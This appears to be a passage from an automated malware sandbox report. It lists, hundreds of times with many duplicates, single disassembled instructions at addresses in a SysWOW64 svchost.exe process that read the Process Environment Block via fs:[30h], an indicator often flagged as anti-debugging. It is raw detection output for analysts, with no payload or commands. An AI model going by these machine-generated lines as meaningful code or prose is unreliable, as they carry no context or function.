            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372C0F0 mov eax, dword ptr fs:[00000030h]1_2_0372C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037720F0 mov ecx, dword ptr fs:[00000030h]1_2_037720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0372A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037380E9 mov eax, dword ptr fs:[00000030h]1_2_037380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B60E0 mov eax, dword ptr fs:[00000030h]1_2_037B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B20DE mov eax, dword ptr fs:[00000030h]1_2_037B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F60B8 mov eax, dword ptr fs:[00000030h]1_2_037F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F60B8 mov ecx, dword ptr fs:[00000030h]1_2_037F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C80A8 mov eax, dword ptr fs:[00000030h]1_2_037C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373208A mov eax, dword ptr fs:[00000030h]1_2_0373208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738770 mov eax, dword ptr fs:[00000030h]1_2_03738770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730750 mov eax, dword ptr fs:[00000030h]1_2_03730750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BE75D mov eax, dword ptr fs:[00000030h]1_2_037BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772750 mov eax, dword ptr fs:[00000030h]1_2_03772750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772750 mov eax, dword ptr fs:[00000030h]1_2_03772750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B4755 mov eax, dword ptr fs:[00000030h]1_2_037B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376674D mov esi, dword ptr fs:[00000030h]1_2_0376674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376674D mov eax, dword ptr fs:[00000030h]1_2_0376674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376674D mov eax, dword ptr fs:[00000030h]1_2_0376674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376273C mov eax, dword ptr fs:[00000030h]1_2_0376273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376273C mov ecx, dword ptr fs:[00000030h]1_2_0376273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376273C mov eax, dword ptr fs:[00000030h]1_2_0376273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AC730 mov eax, dword ptr fs:[00000030h]1_2_037AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376C720 mov eax, dword ptr fs:[00000030h]1_2_0376C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376C720 mov eax, dword ptr fs:[00000030h]1_2_0376C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730710 mov eax, dword ptr fs:[00000030h]1_2_03730710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03760710 mov eax, dword ptr fs:[00000030h]1_2_03760710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376C700 mov eax, dword ptr fs:[00000030h]1_2_0376C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037347FB mov eax, dword ptr fs:[00000030h]1_2_037347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037347FB mov eax, dword ptr fs:[00000030h]1_2_037347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037527ED mov eax, dword ptr fs:[00000030h]1_2_037527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037527ED mov eax, dword ptr fs:[00000030h]1_2_037527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037527ED mov eax, dword ptr fs:[00000030h]1_2_037527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BE7E1 mov eax, dword ptr fs:[00000030h]1_2_037BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373C7C0 mov eax, dword ptr fs:[00000030h]1_2_0373C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B07C3 mov eax, dword ptr fs:[00000030h]1_2_037B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037307AF mov eax, dword ptr fs:[00000030h]1_2_037307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E47A0 mov eax, dword ptr fs:[00000030h]1_2_037E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D678E mov eax, dword ptr fs:[00000030h]1_2_037D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03762674 mov eax, dword ptr fs:[00000030h]1_2_03762674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F866E mov eax, dword ptr fs:[00000030h]1_2_037F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F866E mov eax, dword ptr fs:[00000030h]1_2_037F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A660 mov eax, dword ptr fs:[00000030h]1_2_0376A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A660 mov eax, dword ptr fs:[00000030h]1_2_0376A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374C640 mov eax, dword ptr fs:[00000030h]1_2_0374C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E627 mov eax, dword ptr fs:[00000030h]1_2_0374E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03766620 mov eax, dword ptr fs:[00000030h]1_2_03766620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03768620 mov eax, dword ptr fs:[00000030h]1_2_03768620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373262C mov eax, dword ptr fs:[00000030h]1_2_0373262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772619 mov eax, dword ptr fs:[00000030h]1_2_03772619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE609 mov eax, dword ptr fs:[00000030h]1_2_037AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]1_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]1_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]1_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]1_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]1_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]1_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]1_2_0374260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE6F2 mov eax, dword ptr fs:[00000030h]1_2_037AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE6F2 mov eax, dword ptr fs:[00000030h]1_2_037AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE6F2 mov eax, dword ptr fs:[00000030h]1_2_037AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE6F2 mov eax, dword ptr fs:[00000030h]1_2_037AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B06F1 mov eax, dword ptr fs:[00000030h]1_2_037B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B06F1 mov eax, dword ptr fs:[00000030h]1_2_037B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0376A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A6C7 mov eax, dword ptr fs:[00000030h]1_2_0376A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037666B0 mov eax, dword ptr fs:[00000030h]1_2_037666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376C6A6 mov eax, dword ptr fs:[00000030h]1_2_0376C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734690 mov eax, dword ptr fs:[00000030h]1_2_03734690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734690 mov eax, dword ptr fs:[00000030h]1_2_03734690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376656A mov eax, dword ptr fs:[00000030h]1_2_0376656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376656A mov eax, dword ptr fs:[00000030h]1_2_0376656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376656A mov eax, dword ptr fs:[00000030h]1_2_0376656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738550 mov eax, dword ptr fs:[00000030h]1_2_03738550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738550 mov eax, dword ptr fs:[00000030h]1_2_03738550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]1_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]1_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]1_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]1_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]1_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C6500 mov eax, dword ptr fs:[00000030h]1_2_037C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037325E0 mov eax, dword ptr fs:[00000030h]1_2_037325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376C5ED mov eax, dword ptr fs:[00000030h]1_2_0376C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376C5ED mov eax, dword ptr fs:[00000030h]1_2_0376C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037365D0 mov eax, dword ptr fs:[00000030h]1_2_037365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A5D0 mov eax, dword ptr fs:[00000030h]1_2_0376A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A5D0 mov eax, dword ptr fs:[00000030h]1_2_0376A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E5CF mov eax, dword ptr fs:[00000030h]1_2_0376E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E5CF mov eax, dword ptr fs:[00000030h]1_2_0376E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037545B1 mov eax, dword ptr fs:[00000030h]1_2_037545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037545B1 mov eax, dword ptr fs:[00000030h]1_2_037545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B05A7 mov eax, dword ptr fs:[00000030h]1_2_037B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B05A7 mov eax, dword ptr fs:[00000030h]1_2_037B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B05A7 mov eax, dword ptr fs:[00000030h]1_2_037B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E59C mov eax, dword ptr fs:[00000030h]1_2_0376E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03732582 mov eax, dword ptr fs:[00000030h]1_2_03732582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03732582 mov ecx, dword ptr fs:[00000030h]1_2_03732582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03764588 mov eax, dword ptr fs:[00000030h]1_2_03764588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375A470 mov eax, dword ptr fs:[00000030h]1_2_0375A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375A470 mov eax, dword ptr fs:[00000030h]1_2_0375A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375A470 mov eax, dword ptr fs:[00000030h]1_2_0375A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BC460 mov ecx, dword ptr fs:[00000030h]1_2_037BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EA456 mov eax, dword ptr fs:[00000030h]1_2_037EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372645D mov eax, dword ptr fs:[00000030h]1_2_0372645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375245A mov eax, dword ptr fs:[00000030h]1_2_0375245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372E420 mov eax, dword ptr fs:[00000030h]1_2_0372E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372E420 mov eax, dword ptr fs:[00000030h]1_2_0372E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372E420 mov eax, dword ptr fs:[00000030h]1_2_0372E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372C427 mov eax, dword ptr fs:[00000030h]1_2_0372C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03768402 mov eax, dword ptr fs:[00000030h]1_2_03768402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03768402 mov eax, dword ptr fs:[00000030h]1_2_03768402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03768402 mov eax, dword ptr fs:[00000030h]1_2_03768402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037304E5 mov ecx, dword ptr fs:[00000030h]1_2_037304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037644B0 mov ecx, dword ptr fs:[00000030h]1_2_037644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BA4B0 mov eax, dword ptr fs:[00000030h]1_2_037BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037364AB mov eax, dword ptr fs:[00000030h]1_2_037364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EA49A mov eax, dword ptr fs:[00000030h]1_2_037EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372CB7E mov eax, dword ptr fs:[00000030h]1_2_0372CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DEB50 mov eax, dword ptr fs:[00000030h]1_2_037DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E4B4B mov eax, dword ptr fs:[00000030h]1_2_037E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E4B4B mov eax, dword ptr fs:[00000030h]1_2_037E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C6B40 mov eax, dword ptr fs:[00000030h]1_2_037C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C6B40 mov eax, dword ptr fs:[00000030h]1_2_037C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FAB40 mov eax, dword ptr fs:[00000030h]1_2_037FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D8B42 mov eax, dword ptr fs:[00000030h]1_2_037D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375EB20 mov eax, dword ptr fs:[00000030h]1_2_0375EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375EB20 mov eax, dword ptr fs:[00000030h]1_2_0375EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F8B28 mov eax, dword ptr fs:[00000030h]1_2_037F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F8B28 mov eax, dword ptr fs:[00000030h]1_2_037F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738BF0 mov eax, dword ptr fs:[00000030h]1_2_03738BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738BF0 mov eax, dword ptr fs:[00000030h]1_2_03738BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738BF0 mov eax, dword ptr fs:[00000030h]1_2_03738BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375EBFC mov eax, dword ptr fs:[00000030h]1_2_0375EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BCBF0 mov eax, dword ptr fs:[00000030h]1_2_037BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DEBD0 mov eax, dword ptr fs:[00000030h]1_2_037DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03750BCB mov eax, dword ptr fs:[00000030h]1_2_03750BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03750BCB mov eax, dword ptr fs:[00000030h]1_2_03750BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03750BCB mov eax, dword ptr fs:[00000030h]1_2_03750BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730BCD mov eax, dword ptr fs:[00000030h]1_2_03730BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730BCD mov eax, dword ptr fs:[00000030h]1_2_03730BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730BCD mov eax, dword ptr fs:[00000030h]1_2_03730BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740BBE mov eax, dword ptr fs:[00000030h]1_2_03740BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740BBE mov eax, dword ptr fs:[00000030h]1_2_03740BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E4BB0 mov eax, dword ptr fs:[00000030h]1_2_037E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E4BB0 mov eax, dword ptr fs:[00000030h]1_2_037E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804A80 mov eax, dword ptr fs:[00000030h]1_2_03804A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037ACA72 mov eax, dword ptr fs:[00000030h]1_2_037ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037ACA72 mov eax, dword ptr fs:[00000030h]1_2_037ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376CA6F mov eax, dword ptr fs:[00000030h]1_2_0376CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376CA6F mov eax, dword ptr fs:[00000030h]1_2_0376CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376CA6F mov eax, dword ptr fs:[00000030h]1_2_0376CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DEA60 mov eax, dword ptr fs:[00000030h]1_2_037DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740A5B mov eax, dword ptr fs:[00000030h]1_2_03740A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740A5B mov eax, dword ptr fs:[00000030h]1_2_03740A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03754A35 mov eax, dword ptr fs:[00000030h]1_2_03754A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03754A35 mov eax, dword ptr fs:[00000030h]1_2_03754A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376CA24 mov eax, dword ptr fs:[00000030h]1_2_0376CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375EA2E mov eax, dword ptr fs:[00000030h]1_2_0375EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BCA11 mov eax, dword ptr fs:[00000030h]1_2_037BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376AAEE mov eax, dword ptr fs:[00000030h]1_2_0376AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376AAEE mov eax, dword ptr fs:[00000030h]1_2_0376AAEE
